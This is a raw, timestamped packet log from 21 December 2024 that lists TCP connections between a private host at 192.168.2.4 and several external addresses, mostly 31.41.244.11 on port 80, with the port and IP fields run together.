                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182009935 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182060957 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182111025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182274103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182328939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182435989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182449102 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182475090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182513952 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182931900 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182944059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182954073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182977915 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183021069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183882952 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183897018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.183942080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.184123039 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.184135914 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.184370995 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.301672935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.301738977 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.301768064 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.302551031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.305716991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.305897951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.374363899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.374593019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.374677896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.378767014 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.378858089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.378926039 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.385063887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.385118961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.385122061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.385164022 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.393327951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.393466949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.393524885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.395330906 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.396373987 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.401691914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.401830912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.401892900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.410092115 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.410233021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.410315037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.418464899 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.418627024 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.418634892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.421969891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.426791906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.426944017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.427004099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.435184956 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.435307026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.435362101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.443610907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.443658113 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.443696976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.443772078 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.451256990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.451325893 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.451351881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.454521894 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.566462994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.566512108 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.566596985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.566648006 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.568808079 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.568849087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.568908930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.568955898 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.573482037 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.573528051 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.573599100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.573642015 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.578198910 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.578247070 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.578291893 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.578350067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.582921028 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.582967997 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.583039045 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.583081007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.587517023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.587564945 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.587641001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.587682962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.592204094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.592248917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.592324018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.592363119 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.596889019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.596929073 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.597006083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.597053051 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.597781897 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.601583958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.601636887 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.601715088 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.601758003 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.606240034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.606296062 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.606374979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.606416941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.610910892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.610955000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.611025095 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.611068010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.611463070 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.611509085 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.612507105 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.615614891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.615662098 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.615726948 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.615770102 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.620260954 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.620304108 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.620424986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.620465994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.624922991 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.624983072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.625027895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.625067949 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.629596949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.629652023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.629759073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.629803896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.634257078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.634304047 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.634443998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.634481907 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.639065981 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.639116049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.639183044 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.639226913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.639341116 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.643740892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.643784046 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.643830061 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.643876076 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.648324013 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.648386955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.648417950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.648462057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.652995110 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.653060913 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.653126001 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.653170109 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.657629967 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.657685995 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.727271080 CET49803443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.752578020 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.752825975 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.752895117 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758349895 CET49799443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758403063 CET44349799172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758594990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758645058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758717060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.758770943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.760587931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.760637045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.761271954 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.761322021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.761394024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.761447906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.765305996 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.765352964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.765465021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.765510082 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.767358065 CET4434980320.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.769303083 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.769382000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.769423008 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.769488096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.773364067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.773420095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.773480892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.773523092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.777312994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.777359009 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.777432919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.777477026 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.781277895 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.781373978 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.781404018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.781580925 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.785247087 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.785300970 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.785382986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.785429955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.789267063 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.789316893 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.789355993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.789397955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.793313980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.793366909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.793387890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.793433905 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.797310114 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.797368050 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.797436953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.797483921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.801182985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.801237106 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.801297903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.801350117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.805228949 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.805285931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.805330038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.805372953 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.809130907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.809185028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.809252024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.809335947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.813112974 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.813159943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.813262939 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.813308001 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.817100048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.817154884 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.817231894 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.817280054 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.821016073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.821063995 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.821127892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.821168900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.824980021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.825038910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.825092077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.825139046 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.828948021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.828998089 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.829052925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.829174995 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.832941055 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.832989931 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.833055973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.833100080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.836896896 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.836945057 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.836983919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.837034941 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.840800047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.840842962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.840914011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.840959072 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.844723940 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.844768047 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.844891071 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.844950914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.848714113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.848768950 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.848870039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.848917007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.852664948 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.852715969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.852801085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.852847099 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.856621027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.856664896 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.856765985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.856827021 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.860577106 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.860626936 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.860672951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.860718966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.864586115 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.864639997 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.864676952 CET804980431.41.244.11192.168.2.4
